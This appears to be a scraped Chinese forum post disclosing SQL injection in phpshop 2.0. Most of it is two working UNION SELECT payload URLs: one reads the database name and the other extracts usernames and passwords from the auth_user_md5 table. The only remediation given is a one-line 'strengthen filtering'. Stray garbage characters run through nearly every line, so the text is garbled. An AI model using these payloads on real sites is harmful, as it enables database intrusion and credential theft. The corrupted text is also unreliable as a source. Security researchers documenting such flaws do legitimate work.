标题 : phpshop 2.0 SQL Injection Vulnerability4 ?1 l6 P L9 B C0 m1 m
" v9 x. ?5 b+ d8 r! X4 `+ L. r
作者 : By onestree
! O |/ v, J5 M Q& r% w下载地址 : http://code.google.com/p/phpshop/downloads/list, [* C1 d2 c, n- m+ i3 |
测试地址: windows 7 / ubuntu
$ s0 Q: m+ l* G, v6 y
% A7 F& J9 \- `* t
; q7 E; q5 G6 a5 e( V% T, \SQLi p0c:
% r6 v3 d: M8 D8 L; T$ { + @8 }1 o7 Y1 S& F
==================) V2 Z3 \( @. Z1 u# `" s- U% b
* i7 @0 w5 I" P) F6 l" U( Phttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'3 I: H) i8 B& o8 O
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --+ g, J/ B o9 H( j
8 f* j9 m: ~+ R# ^
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--4 f1 j5 K9 |0 B2 G. S/ C
# M* H4 g" Y( R' p: [7 v7 h修复:
, X! D$ }- [6 M: [& G- F加强过滤
4 q, ]/ t4 |" Z1 ^) C7 l! \( t2 j. d* ~( I# o/ ^
) g; G" E3 d V- x8 m+ j" K |